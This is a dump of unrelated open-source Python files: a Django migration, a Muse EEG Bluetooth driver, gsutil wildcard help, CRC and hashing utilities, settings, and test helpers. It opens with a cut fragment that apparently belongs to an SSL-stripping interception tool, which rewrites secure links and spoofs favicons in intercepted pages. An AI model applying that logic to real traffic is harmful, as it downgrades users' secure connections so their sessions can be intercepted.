data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
if (self.urlMonitor.isFaviconSpoofing()):
data = self.replaceFavicon(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data
|
ghostwords/localore
|
refs/heads/master
|
localore/blog/migrations/0019_auto_20160325_1159.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0018_auto_20160324_1029'),
]
operations = [
migrations.AlterModelOptions(
name='blogindexpage',
options={'verbose_name': 'connections index page'},
),
migrations.AlterModelOptions(
name='blogpage',
options={'verbose_name': 'connection'},
),
]
|
akloster/pysiology
|
refs/heads/master
|
pysiology/muse.py
|
1
|
import time
from collections import defaultdict
import asyncio
from asyncio import coroutine, sleep, async
import bluetooth
import numpy as np
import bcolz
from sample_source import SampleSource
from utils import TSLogger, message
from streamer import StreamerCommand
import json
from command import ServerCommand
import muse_parser
class MuseManager(object):
""" Manages the Muse devices globally. Not tested with multiple devices yet,
though. """
def __init__(self):
self.devices = {}
def connect(self, address):
if address in self.devices:
return self.devices[address].connected.wait()
device = MuseDevice(address)
self.devices[address] = device
asyncio.get_event_loop().create_task(device.run())
return device.connected.wait()
def disconnect(self, address):
self.devices[address].disconnect()
muse_manager = MuseManager()
class MuseDeviceParser(muse_parser.Parser):
def __init__(self, device):
self.device = device
super().__init__()
def receive_value(self, channel, value):
self.device.receive_value(channel, value)
class MuseDevice(object):
channel_names = ["TP9", "AF7", "AF8", "TP10", "LAUX", "RAUX", "battery_percent"]
def __init__(self, addr):
super().__init__()
self.addr = addr
self.record = True
self.sample_count = 0
self.time_offset = None
self.loggers = {}
for channel in self.channel_names:
logger = TSLogger(dtype="int16")
self.loggers[channel] = logger
logger.timing_counter = 0
self.connected = asyncio.Event()
def get_indices(self):
return
@coroutine
def run(self):
yield from self.connect()
@coroutine
def receive_short(self):
for i in range(10):
yield from sleep(0.1)
try:
line = self.socket.recv(1000)
return line
except:
continue
return b""
@coroutine
def try_to_connect(self):
try:
self.socket = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
self.socket.connect((self.addr, 1))
self.socket.setblocking(False)
except bluetooth.BluetoothError as e:
print(e)
return False
# Get hardware/firmware versions,
# useful for debugging with new devices
yield from sleep(0.1)
self.socket.send("v\n")
line = yield from self.receive_short()
if line is None:
return False
print(line.decode("ascii"))
# Preset AB for research mode, 500hz, 16bit
self.socket.send("%AB\n")
yield from sleep(0.1)
# Select 50hz notch filter
self.socket.send("g 408c\n")
yield from sleep(0.05)
self.socket.send("?\n")
line = yield from self.receive_short()
if line is None:
return False
print(line.decode("ascii"))
return True
@coroutine
def connect(self):
while 1:
self.sample_count = 0
print("Trying to connect")
# Loop until a connection is successful
success = yield from self.try_to_connect()
if success:
print("Connection made!")
self.connected.set()
yield from self.read_loop()
else:
print("Connecting to Muse failed")
yield from sleep(3)
@coroutine
def read_loop(self):
""" Reads repeatedly from bluetooth socket, and returns if errors are
deemed unrecoverable. """
error_count = 0
parser = MuseDeviceParser(self)
self.socket.send("s\n")
self.time_offset = time.time()
self.next_keepalive = time.time() + 5
for channel in self.channel_names:
self.loggers[channel].timing_counter = 0
while 1:
if not self.record:
yield from sleep(1)
continue
yield from sleep(0.05)
if self.next_keepalive < time.time():
self.next_keepalive = time.time()+5
self.socket.send("k\n")
try:
buffer = self.socket.recv(10000)
for b in buffer:
parser.send(b)
error_count = 0
except bluetooth.BluetoothError as e:
# Errno 11 is thrown quite often, and usually
# only means that no new data has been sent.
if str(e).startswith("(11"):
error_count += 1
if error_count > 5:
self.socket.close()
return
yield from sleep(0.025)
else:
print("error on reading:", e)
self.socket.close()
yield from sleep(1)
return
def receive_value(self, channel, value):
# Muse doesn't send any timing information, so we assume
# constant frequencies which is 500 for EEG and 50 for Accel.
# Battery data is a lot more rare so we get the current time.
logger = self.loggers[channel]
if channel == "battery_percent":
t = time.time()
elif channel in ["ACCEL1", "ACCEL2"]:
t = self.time_offset + (logger.timing_counter / 50.0)
logger.timing_counter += 1
else:
t = self.time_offset + (logger.timing_counter / 500.0)
logger.timing_counter += 1
logger.log(t, value)
def disconnect(self):
pass
def get_indices(self):
return {k:len(v) for k,v in self.loggers.items()}
class MuseConnectCommand(ServerCommand):
@coroutine
def run(self, **kwargs):
print ("Connecting to Muse...")
address = kwargs['address']
print(address)
yield from muse_manager.connect(address)
yield from self.websocket.send(message(msg="muse_connected"))
class MuseStreamCommand(StreamerCommand):
@coroutine
def run(self, address=None, interval=1.0, **kwargs):
device = muse_manager.devices[address]
msg = dict(mtp="muse_status",
address=address,
status="connecting",
)
yield from device.connected.wait()
print ("Start streaming")
time_start = time.time()
last_indices = device.get_indices()
while not self.cancelled:
yield from sleep(0.2)
msg = dict(mtp="muse_stream",
address=address)
for key,ts in device.loggers.items():
last_index = last_indices[key]
times = ts.times[last_index:]
values = ts.values[last_index:]
if len(values)>0:
msg[key] = [times, values]
last_indices = device.get_indices()
json = message(**msg)
yield from self.websocket.send(json)
|
studio666/gratipay.com
|
refs/heads/master
|
tests/js/utils/auth-helper.py
|
3
|
#!/usr/bin/env python
from __future__ import print_function, unicode_literals
import os
import sys
import uuid
from datetime import timedelta
from aspen.utils import utcnow
import gratipay
from gratipay import wireup
from gratipay.models.participant import Participant
if len(sys.argv) < 2:
sys.exit('Usage: %s <user>' % sys.argv[0])
db = Participant.db = wireup.db(wireup.env())
gratipay.RESTRICTED_USERNAMES = os.listdir('./www/')
username = sys.argv[1]
session_token = uuid.uuid4().hex
session_expires = utcnow() + timedelta(hours=6)
try:
participant = Participant.from_username(username)
participant.db = db
except:
participant = Participant.with_random_username()
participant.db = db
participant.change_username(username)
participant.set_as_claimed()
participant.update_session(session_token, session_expires)
print(session_token)
|
SummerLW/Perf-Insight-Report
|
refs/heads/test
|
third_party/gsutil/gslib/addlhelp/wildcards.py
|
22
|
# -*- coding: utf-8 -*-
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Additional help about wildcards."""
from __future__ import absolute_import
from gslib.help_provider import HelpProvider
_DETAILED_HELP_TEXT = ("""
<B>DESCRIPTION</B>
gsutil supports URI wildcards. For example, the command:
gsutil cp gs://bucket/data/abc* .
will copy all objects that start with gs://bucket/data/abc followed by any
number of characters within that subdirectory.
<B>DIRECTORY BY DIRECTORY VS RECURSIVE WILDCARDS</B>
The "*" wildcard only matches up to the end of a path within
a subdirectory. For example, if bucket contains objects
named gs://bucket/data/abcd, gs://bucket/data/abcdef,
and gs://bucket/data/abcxyx, as well as an object in a sub-directory
(gs://bucket/data/abc/def) the above gsutil cp command would match the
first 3 object names but not the last one.
If you want matches to span directory boundaries, use a '**' wildcard:
gsutil cp gs://bucket/data/abc** .
will match all four objects above.
Note that gsutil supports the same wildcards for both objects and file names.
Thus, for example:
gsutil cp data/abc* gs://bucket
will match all names in the local file system. Most command shells also
support wildcarding, so if you run the above command probably your shell
is expanding the matches before running gsutil. However, most shells do not
support recursive wildcards ('**'), and you can cause gsutil's wildcarding
support to work for such shells by single-quoting the arguments so they
don't get interpreted by the shell before being passed to gsutil:
gsutil cp 'data/abc**' gs://bucket
<B>BUCKET WILDCARDS</B>
You can specify wildcards for bucket names within a single project. For
example:
gsutil ls gs://data*.example.com
will list the contents of all buckets whose name starts with "data" and
ends with ".example.com" in the default project. The -p option can be used
to specify a project other than the default. For example:
gsutil ls -p other-project gs://data*.example.com
You can also combine bucket and object name wildcards. For example this
command will remove all ".txt" files in any of your Google Cloud Storage
buckets in the default project:
gsutil rm gs://*/**.txt
<B>OTHER WILDCARD CHARACTERS</B>
In addition to '*', you can use these wildcards:
?
Matches a single character. For example "gs://bucket/??.txt"
only matches objects with two characters followed by .txt.
[chars]
Match any of the specified characters. For example
"gs://bucket/[aeiou].txt" matches objects that contain a single vowel
character followed by .txt
[char range]
Match any of the range of characters. For example
"gs://bucket/[a-m].txt" matches objects that contain letters
a, b, c, ... or m, and end with .txt.
You can combine wildcards to provide more powerful matches, for example:
gs://bucket/[a-m]??.j*g
<B>DIFFERENT BEHAVIOR FOR "DOT" FILES IN LOCAL FILE SYSTEM</B>
Per standard Unix behavior, the wildcard "*" only matches files that don't
start with a "." character (to avoid confusion with the "." and ".."
directories present in all Unix directories). gsutil provides this same
behavior when using wildcards over a file system URI, but does not provide
this behavior over cloud URIs. For example, the following command will copy
all objects from gs://bucket1 to gs://bucket2:
gsutil cp gs://bucket1/* gs://bucket2
but the following command will copy only files that don't start with a "."
from the directory "dir" to gs://bucket1:
gsutil cp dir/* gs://bucket1
<B>EFFICIENCY CONSIDERATION: USING WILDCARDS OVER MANY OBJECTS</B>
It is more efficient, faster, and less network traffic-intensive
to use wildcards that have a non-wildcard object-name prefix, like:
gs://bucket/abc*.txt
than it is to use wildcards as the first part of the object name, like:
gs://bucket/*abc.txt
This is because the request for "gs://bucket/abc*.txt" asks the server to send
back the subset of results whose object name start with "abc" at the bucket
root, and then gsutil filters the result list for objects whose name ends with
".txt". In contrast, "gs://bucket/*abc.txt" asks the server for the complete
list of objects in the bucket root, and then filters for those objects whose
name ends with "abc.txt". This efficiency consideration becomes increasingly
noticeable when you use buckets containing thousands or more objects. It is
sometimes possible to set up the names of your objects to fit with expected
wildcard matching patterns, to take advantage of the efficiency of doing
server-side prefix requests. See, for example "gsutil help prod" for a
concrete use case example.
<B>EFFICIENCY CONSIDERATION: USING MID-PATH WILDCARDS</B>
Suppose you have a bucket with these objects:
gs://bucket/obj1
gs://bucket/obj2
gs://bucket/obj3
gs://bucket/obj4
gs://bucket/dir1/obj5
gs://bucket/dir2/obj6
If you run the command:
gsutil ls gs://bucket/*/obj5
gsutil will perform a /-delimited top-level bucket listing and then one bucket
listing for each subdirectory, for a total of 3 bucket listings:
GET /bucket/?delimiter=/
GET /bucket/?prefix=dir1/obj5&delimiter=/
GET /bucket/?prefix=dir2/obj5&delimiter=/
The more bucket listings your wildcard requires, the slower and more expensive
it will be. The number of bucket listings required grows as:
- the number of wildcard components (e.g., "gs://bucket/a??b/c*/*/d"
has 3 wildcard components);
- the number of subdirectories that match each component; and
- the number of results (pagination is implemented using one GET
request per 1000 results, specifying markers for each).
If you want to use a mid-path wildcard, you might try instead using a
recursive wildcard, for example:
gsutil ls gs://bucket/**/obj5
This will match more objects than "gs://bucket/*/obj5" (since it spans
directories), but is implemented using a delimiter-less bucket listing
request (which means fewer bucket requests, though it will list the entire
bucket and filter locally, so that could require a non-trivial amount of
network traffic).
""")
class CommandOptions(HelpProvider):
"""Additional help about wildcards."""
# Help specification. See help_provider.py for documentation.
help_spec = HelpProvider.HelpSpec(
help_name='wildcards',
help_name_aliases=['wildcard', '*', '**'],
help_type='additional_help',
help_one_line_summary='Wildcard Names',
help_text=_DETAILED_HELP_TEXT,
subcommand_help_text={},
)
|
mklinker/uavcan
|
refs/heads/master
|
pyuavcan/pyuavcan/dsdl/signature.py
|
15
|
#
# UAVCAN DSDL signature computation
#
# Copyright (C) 2014 Pavel Kirienko <pavel.kirienko@gmail.com>
#
from __future__ import division, absolute_import, print_function, unicode_literals
#
# CRC-64-WE
# Description: http://reveng.sourceforge.net/crc-catalogue/17plus.htm#crc.cat-bits.64
# Initial value: 0xFFFFFFFFFFFFFFFF
# Poly: 0x42F0E1EBA9EA3693
# Reverse: no
# Output xor: 0xFFFFFFFFFFFFFFFF
# Check: 0x62EC59E3F1A4F00A
#
class Signature:
'''
This class implements the UAVCAN DSDL signature hash function. Please refer to the specification for details.
'''
MASK64 = 0xFFFFFFFFFFFFFFFF
POLY = 0x42F0E1EBA9EA3693
def __init__(self, extend_from=None):
'''
extend_from Initial value (optional)
'''
if extend_from is not None:
self._crc = (int(extend_from) & Signature.MASK64) ^ Signature.MASK64
else:
self._crc = Signature.MASK64
def add(self, data_bytes):
'''Feed ASCII string or bytes to the signature function'''
try:
if isinstance(data_bytes, basestring): # Python 2.7 compatibility
data_bytes = map(ord, data_bytes)
except NameError:
if isinstance(data_bytes, str): # This branch will be taken on Python 3
data_bytes = map(ord, data_bytes)
for b in data_bytes:
self._crc ^= (b << 56) & Signature.MASK64
for _ in range(8):
if self._crc & (1 << 63):
self._crc = ((self._crc << 1) & Signature.MASK64) ^ Signature.POLY
else:
self._crc <<= 1
def get_value(self):
'''Returns integer signature value'''
return (self._crc & Signature.MASK64) ^ Signature.MASK64
def compute_signature(data):
'''
One-shot signature computation for ASCII string or bytes.
Returns integer signture value.
'''
s = Signature()
s.add(data)
return s.get_value()
# if __name__ == '__main__':
if 1:
s = Signature()
s.add(b'123')
s.add('456789')
assert s.get_value() == 0x62EC59E3F1A4F00A
|
tarvitz/django-actions
|
refs/heads/master
|
settings.py
|
1
|
# Django settings for actions project.
import os
import sys
ROOT_PATH = os.path.dirname(__file__)
#if not ROOT_PATH in sys.path:
# sys.path.insert(0, ROOT_PATH)
def rel_path(path):
return os.path.join(ROOT_PATH, path)
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'db.sqlite3', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '(b&1(p19+9ah0hx)co^_z*ld$09v+%n+*o&p)4h6ux-fa)qv_p'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
rel_path('templates'),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'django_actions',
'apps.example',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
infoxchange/django-guardian
|
refs/heads/devel
|
extras.py
|
85
|
import _ast
import os
import sys
from setuptools import Command
#from pyflakes.scripts import pyflakes as flakes
def check(filename):
from pyflakes import reporter as mod_reporter
from pyflakes.checker import Checker
codeString = open(filename).read()
reporter = mod_reporter._makeDefaultReporter()
# First, compile into an AST and handle syntax errors.
try:
tree = compile(codeString, filename, "exec", _ast.PyCF_ONLY_AST)
except SyntaxError:
value = sys.exc_info()[1]
msg = value.args[0]
(lineno, offset, text) = value.lineno, value.offset, value.text
# If there's an encoding problem with the file, the text is None.
if text is None:
# Avoid using msg, since for the only known case, it contains a
# bogus message that claims the encoding the file declared was
# unknown.
reporter.unexpectedError(filename, 'problem decoding source')
else:
reporter.syntaxError(filename, msg, lineno, offset, text)
return 1
except Exception:
reporter.unexpectedError(filename, 'problem decoding source')
return 1
else:
# Okay, it's syntactically valid. Now check it.
lines = codeString.splitlines()
warnings = Checker(tree, filename)
warnings.messages.sort(key=lambda m: m.lineno)
real_messages = []
for m in warnings.messages:
line = lines[m.lineno - 1]
if 'pyflakes:ignore' in line.rsplit('#', 1)[-1]:
# ignore lines with pyflakes:ignore
pass
else:
real_messages.append(m)
reporter.flake(m)
return len(real_messages)
class RunFlakesCommand(Command):
"""
Runs pyflakes against guardian codebase.
"""
description = "Check sources with pyflakes"
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
try:
import pyflakes # pyflakes:ignore
except ImportError:
sys.stderr.write("No pyflakes installed!\n")
sys.exit(-1)
thisdir = os.path.dirname(__file__)
guardiandir = os.path.join(thisdir, 'guardian')
warns = 0
# Define top-level directories
for topdir, dirnames, filenames in os.walk(guardiandir):
paths = (os.path.join(topdir, f) for f in filenames if f .endswith('.py'))
for path in paths:
if path.endswith('tests/__init__.py'):
# ignore that module (it should only gather test cases with *)
continue
warns += check(path)
if warns > 0:
sys.stderr.write("ERROR: Finished with total %d warnings.\n" % warns)
sys.exit(1)
else:
print("No problems found in source codes.")
|
akionakamura/scikit-learn
|
refs/heads/master
|
sklearn/externals/joblib/hashing.py
|
194
|
"""
Fast cryptographic hash of Python objects, with a special case for fast
hashing of numpy arrays.
"""
# Author: Gael Varoquaux <gael dot varoquaux at normalesup dot org>
# Copyright (c) 2009 Gael Varoquaux
# License: BSD Style, 3 clauses.
import warnings
import pickle
import hashlib
import sys
import types
import struct
import io
if sys.version_info[0] < 3:
Pickler = pickle.Pickler
else:
Pickler = pickle._Pickler
class _ConsistentSet(object):
""" Class used to ensure the hash of Sets is preserved
whatever the order of its items.
"""
def __init__(self, set_sequence):
self._sequence = sorted(set_sequence)
class _MyHash(object):
""" Class used to hash objects that won't normally pickle """
def __init__(self, *args):
self.args = args
class Hasher(Pickler):
""" A subclass of pickler, to do cryptographic hashing, rather than
pickling.
"""
def __init__(self, hash_name='md5'):
self.stream = io.BytesIO()
Pickler.__init__(self, self.stream, protocol=2)
# Initialise the hash obj
self._hash = hashlib.new(hash_name)
def hash(self, obj, return_digest=True):
try:
self.dump(obj)
except pickle.PicklingError as e:
warnings.warn('PicklingError while hashing %r: %r' % (obj, e))
dumps = self.stream.getvalue()
self._hash.update(dumps)
if return_digest:
return self._hash.hexdigest()
def save(self, obj):
if isinstance(obj, (types.MethodType, type({}.pop))):
# the Pickler cannot pickle instance methods; here we decompose
# them into components that make them uniquely identifiable
if hasattr(obj, '__func__'):
func_name = obj.__func__.__name__
else:
func_name = obj.__name__
inst = obj.__self__
if type(inst) == type(pickle):
obj = _MyHash(func_name, inst.__name__)
elif inst is None:
# type(None) or type(module) do not pickle
obj = _MyHash(func_name, inst)
else:
cls = obj.__self__.__class__
obj = _MyHash(func_name, inst, cls)
Pickler.save(self, obj)
# The dispatch table of the pickler is not accessible in Python
# 3, as these lines are only bugware for IPython, we skip them.
def save_global(self, obj, name=None, pack=struct.pack):
# We have to override this method in order to deal with objects
# defined interactively in IPython that are not injected in
# __main__
kwargs = dict(name=name, pack=pack)
if sys.version_info >= (3, 4):
del kwargs['pack']
try:
Pickler.save_global(self, obj, **kwargs)
except pickle.PicklingError:
Pickler.save_global(self, obj, **kwargs)
module = getattr(obj, "__module__", None)
if module == '__main__':
my_name = name
if my_name is None:
my_name = obj.__name__
mod = sys.modules[module]
if not hasattr(mod, my_name):
# IPython doesn't inject the variables define
# interactively in __main__
setattr(mod, my_name, obj)
dispatch = Pickler.dispatch.copy()
# builtin
dispatch[type(len)] = save_global
# type
dispatch[type(object)] = save_global
# classobj
dispatch[type(Pickler)] = save_global
# function
dispatch[type(pickle.dump)] = save_global
def _batch_setitems(self, items):
# forces order of keys in dict to ensure consistent hash
Pickler._batch_setitems(self, iter(sorted(items)))
def save_set(self, set_items):
# forces order of items in Set to ensure consistent hash
Pickler.save(self, _ConsistentSet(set_items))
dispatch[type(set())] = save_set
class NumpyHasher(Hasher):
""" Special case the hasher for when numpy is loaded.
"""
def __init__(self, hash_name='md5', coerce_mmap=False):
"""
Parameters
----------
hash_name: string
The hash algorithm to be used
coerce_mmap: boolean
Make no difference between np.memmap and np.ndarray
objects.
"""
self.coerce_mmap = coerce_mmap
Hasher.__init__(self, hash_name=hash_name)
# delayed import of numpy, to avoid tight coupling
import numpy as np
self.np = np
if hasattr(np, 'getbuffer'):
self._getbuffer = np.getbuffer
else:
self._getbuffer = memoryview
def save(self, obj):
""" Subclass the save method, to hash ndarray subclass, rather
than pickling them. Off course, this is a total abuse of
the Pickler class.
"""
if isinstance(obj, self.np.ndarray) and not obj.dtype.hasobject:
# Compute a hash of the object:
try:
# memoryview is not supported for some dtypes,
# e.g. datetime64, see
# https://github.com/numpy/numpy/issues/4983. The
# workaround is to view the array as bytes before
# taking the memoryview
obj_bytes_view = obj.view(self.np.uint8)
self._hash.update(self._getbuffer(obj_bytes_view))
# ValueError is raised by .view when the array is not contiguous
# BufferError is raised by Python 3 in the hash update if
# the array is Fortran rather than C contiguous
except (ValueError, BufferError):
# Cater for non-single-segment arrays: this creates a
# copy, and thus aleviates this issue.
# XXX: There might be a more efficient way of doing this
obj_bytes_view = obj.flatten().view(self.np.uint8)
self._hash.update(self._getbuffer(obj_bytes_view))
# We store the class, to be able to distinguish between
# Objects with the same binary content, but different
# classes.
if self.coerce_mmap and isinstance(obj, self.np.memmap):
# We don't make the difference between memmap and
# normal ndarrays, to be able to reload previously
# computed results with memmap.
klass = self.np.ndarray
else:
klass = obj.__class__
# We also return the dtype and the shape, to distinguish
# different views on the same data with different dtypes.
# The object will be pickled by the pickler hashed at the end.
obj = (klass, ('HASHED', obj.dtype, obj.shape, obj.strides))
Hasher.save(self, obj)
def hash(obj, hash_name='md5', coerce_mmap=False):
""" Quick calculation of a hash to identify uniquely Python objects
containing numpy arrays.
Parameters
-----------
hash_name: 'md5' or 'sha1'
Hashing algorithm used. sha1 is supposedly safer, but md5 is
faster.
coerce_mmap: boolean
Make no difference between np.memmap and np.ndarray
"""
if 'numpy' in sys.modules:
hasher = NumpyHasher(hash_name=hash_name, coerce_mmap=coerce_mmap)
else:
hasher = Hasher(hash_name=hash_name)
return hasher.hash(obj)
|
fengbaicanhe/intellij-community
|
refs/heads/master
|
python/testData/refactoring/inlinelocal/operatorPrecedence/bitwiseShift.after.py
|
79
|
(10 << 2)[::-5]
(10 << 2)[5]
(10 << 2)(5)
(10 << 2).foo
-(10 << 2)
+(10 << 2)
~(10 << 2)
5 ** (10 << 2)
(10 << 2) ** 5
5 * (10 << 2)
(10 << 2) * 5
5 / (10 << 2)
(10 << 2) / 5
5 // (10 << 2)
(10 << 2) // 5
5 + (10 << 2)
(10 << 2) + 5
(10 << 2) - 5
5 - (10 << 2)
5 >> 10 << 2
10 << 2 << 5
5 & 10 << 2
10 << 2 & 5
5 ^ 10 << 2
10 << 2 ^ 5
5 | 10 << 2
10 << 2 | 5
() in 10 << 2
10 << 2 in ()
5 is 10 << 2
10 << 2 is 5
5 < 10 << 2
10 << 2 < 5
not 10 << 2
5 and 10 << 2
10 << 2 and 5
5 or 10 << 2
10 << 2 or 5
10 << 2 if 10 << 2 else 10 << 2
|
bjoshua/ansible
|
refs/heads/devel
|
lib/ansible/compat/tests/unittest.py
|
375
|
# (c) 2014, Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
'''
Compat module for Python2.7's unittest module
'''
import sys
# Python 2.6
if sys.version_info < (2, 7):
try:
# Need unittest2 on python2.6
from unittest2 import *
except ImportError:
print('You need unittest2 installed on python2.6.x to run tests')
else:
from unittest import *
|
michaelgallacher/intellij-community
|
refs/heads/master
|
python/testData/completion/fromNamespacePackageImport/a.after.py
|
83
|
from p1 import m1
|
xin3liang/platform_external_chromium-trace
|
refs/heads/master
|
trace-viewer/third_party/pywebsocket/src/test/test_mux.py
|
29
|
#!/usr/bin/env python
#
# Copyright 2012, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for mux module."""
import Queue
import logging
import optparse
import unittest
import struct
import sys
import set_sys_path # Update sys.path to locate mod_pywebsocket module.
from mod_pywebsocket import common
from mod_pywebsocket import mux
from mod_pywebsocket._stream_base import ConnectionTerminatedException
from mod_pywebsocket._stream_hybi import Stream
from mod_pywebsocket._stream_hybi import StreamOptions
from mod_pywebsocket._stream_hybi import create_binary_frame
from mod_pywebsocket._stream_hybi import parse_frame
import mock
class _OutgoingChannelData(object):
def __init__(self):
self.messages = []
self.control_messages = []
self.current_opcode = None
self.pending_fragments = []
class _MockMuxConnection(mock.MockBlockingConn):
"""Mock class of mod_python connection for mux."""
def __init__(self):
mock.MockBlockingConn.__init__(self)
self._control_blocks = []
self._channel_data = {}
self._current_opcode = None
self._pending_fragments = []
def write(self, data):
"""Override MockBlockingConn.write."""
self._current_data = data
self._position = 0
def _receive_bytes(length):
if self._position + length > len(self._current_data):
raise ConnectionTerminatedException(
'Failed to receive %d bytes from encapsulated '
'frame' % length)
data = self._current_data[self._position:self._position+length]
self._position += length
return data
opcode, payload, fin, rsv1, rsv2, rsv3 = (
parse_frame(_receive_bytes, unmask_receive=False))
self._pending_fragments.append(payload)
if self._current_opcode is None:
if opcode == common.OPCODE_CONTINUATION:
raise Exception('Sending invalid continuation opcode')
self._current_opcode = opcode
else:
if opcode != common.OPCODE_CONTINUATION:
raise Exception('Sending invalid opcode %d' % opcode)
if not fin:
return
inner_frame_data = ''.join(self._pending_fragments)
self._pending_fragments = []
self._current_opcode = None
